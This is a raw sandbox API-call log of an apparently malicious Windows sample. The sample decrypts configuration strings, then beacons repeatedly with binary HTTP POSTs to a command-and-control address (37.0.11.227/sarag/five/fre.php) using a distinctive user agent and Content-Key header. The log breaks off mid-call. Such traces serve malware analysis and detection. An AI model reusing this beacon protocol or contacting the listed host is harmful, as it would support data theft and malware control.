[0200.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0200.269] GetProcessHeap () returned 0x690000 [0200.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0200.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.271] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0200.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.272] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.273] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.273] GetProcessHeap () returned 0x690000 [0200.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0200.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.275] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0200.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.276] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0200.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.277] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0200.277] GetProcessHeap () returned 0x690000 [0200.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0200.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.280] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.281] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.287] GetProcessHeap () returned 0x690000 [0200.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0200.287] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.288] GetProcessHeap () returned 0x690000 [0200.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0200.288] GetProcessHeap () returned 0x690000 [0200.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.288] GetProcessHeap () returned 0x690000 [0200.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.291] GetProcessHeap () returned 0x690000 [0200.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0200.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0200.305] GetProcessHeap () returned 0x690000 [0200.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0200.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.306] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.308] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.308] GetProcessHeap () returned 0x690000 [0200.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0200.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.310] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0200.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.313] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.314] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0200.314] GetProcessHeap () returned 0x690000 [0200.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0200.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0200.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.316] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0200.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0200.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.319] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0200.319] GetProcessHeap () returned 0x690000 [0200.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0200.319] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ade28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0200.319] GetProcessHeap () returned 0x690000 [0200.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0200.319] socket (af=2, type=1, protocol=6) returned 0x440 [0200.319] connect (s=0x440, name=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0200.340] FreeAddrInfoW (pAddrInfo=0x6ade28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0200.340] GetProcessHeap () returned 0x690000 [0200.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0200.340] GetProcessHeap () returned 0x690000 [0200.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0200.341] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.342] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.342] GetProcessHeap () returned 0x690000 [0200.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0200.342] GetProcessHeap () returned 0x690000 [0200.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.343] GetProcessHeap () returned 0x690000 [0200.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0200.343] GetProcessHeap () returned 0x690000 [0200.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0200.343] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.346] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.346] GetProcessHeap () returned 0x690000 [0200.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0200.346] GetProcessHeap () returned 0x690000 [0200.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.346] send (s=0x440, buf=0x6abd08*, len=242, flags=0) returned 242 [0200.347] send (s=0x440, buf=0x6aba40*, len=159, flags=0) returned 159 [0200.347] GetProcessHeap () returned 0x690000 [0200.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0200.347] recv (in: s=0x440, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0200.430] GetProcessHeap () returned 0x690000 [0200.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.431] GetProcessHeap () returned 0x690000 [0200.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.431] GetProcessHeap () returned 0x690000 [0200.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0200.431] GetProcessHeap () returned 0x690000 [0200.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0200.431] closesocket (s=0x440) returned 0 [0200.432] GetProcessHeap () returned 0x690000 [0200.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0200.432] GetProcessHeap () returned 0x690000 [0200.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0200.433] GetProcessHeap () returned 0x690000 [0200.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.433] GetProcessHeap () returned 0x690000 [0200.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0200.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12a8) returned 0x440 [0200.451] Sleep (dwMilliseconds=0xea60) [0200.452] GetProcessHeap () returned 0x690000 [0200.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0200.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0200.483] GetProcessHeap () returned 0x690000 [0200.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0200.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.484] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.485] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.486] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.487] GetProcessHeap () returned 0x690000 [0200.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0200.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.488] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0200.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.489] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.491] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0200.491] GetProcessHeap () returned 0x690000 [0200.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0200.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.492] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.495] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.496] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.497] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.497] GetProcessHeap () returned 0x690000 [0200.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0200.497] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.497] GetProcessHeap () returned 0x690000 [0200.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0200.498] GetProcessHeap () returned 0x690000 [0200.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0200.498] GetProcessHeap () returned 0x690000 [0200.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.499] GetProcessHeap () returned 0x690000 [0200.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0200.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.518] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0200.523] GetProcessHeap () returned 0x690000 [0200.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0200.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.524] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.534] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.535] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.535] GetProcessHeap () returned 0x690000 [0200.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0200.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.536] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0200.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.539] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.540] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0200.540] GetProcessHeap () returned 0x690000 [0200.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0200.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.541] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0200.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.541] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0200.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.542] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0200.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.543] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0200.543] GetProcessHeap () returned 0x690000 [0200.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0200.543] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ada68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0200.543] GetProcessHeap () returned 0x690000 [0200.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0200.543] socket (af=2, type=1, protocol=6) returned 0x444 [0200.544] connect (s=0x444, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0200.570] FreeAddrInfoW (pAddrInfo=0x6ada68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0200.570] GetProcessHeap () returned 0x690000 [0200.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0200.570] GetProcessHeap () returned 0x690000 [0200.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0200.571] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.572] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.572] GetProcessHeap () returned 0x690000 [0200.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0200.572] GetProcessHeap () returned 0x690000 [0200.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.572] GetProcessHeap () returned 0x690000 [0200.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0200.573] GetProcessHeap () returned 0x690000 [0200.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0200.573] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.574] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.574] GetProcessHeap () returned 0x690000 [0200.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0200.574] GetProcessHeap () returned 0x690000 [0200.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.575] send (s=0x444, buf=0x6abd08*, len=242, flags=0) returned 242 [0200.575] send (s=0x444, buf=0x6aba40*, len=159, flags=0) returned 159 [0200.575] GetProcessHeap () returned 0x690000 [0200.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0200.576] recv (in: s=0x444, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0200.647] GetProcessHeap () returned 0x690000 [0200.647] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.647] GetProcessHeap () returned 0x690000 [0200.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.648] GetProcessHeap () returned 0x690000 [0200.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0200.649] GetProcessHeap () returned 0x690000 [0200.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0200.649] closesocket (s=0x444) returned 0 [0200.650] GetProcessHeap () returned 0x690000 [0200.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0200.650] GetProcessHeap () returned 0x690000 [0200.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0200.651] GetProcessHeap () returned 0x690000 [0200.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.651] GetProcessHeap () returned 0x690000 [0200.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0200.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12bc) returned 0x444 [0200.654] Sleep (dwMilliseconds=0xea60) [0200.655] GetProcessHeap () returned 0x690000 [0200.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0200.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.657] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0200.675] GetProcessHeap () returned 0x690000 [0200.675] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0200.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.676] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.677] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.678] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.679] GetProcessHeap () returned 0x690000 [0200.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0200.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.681] CryptDecrypt 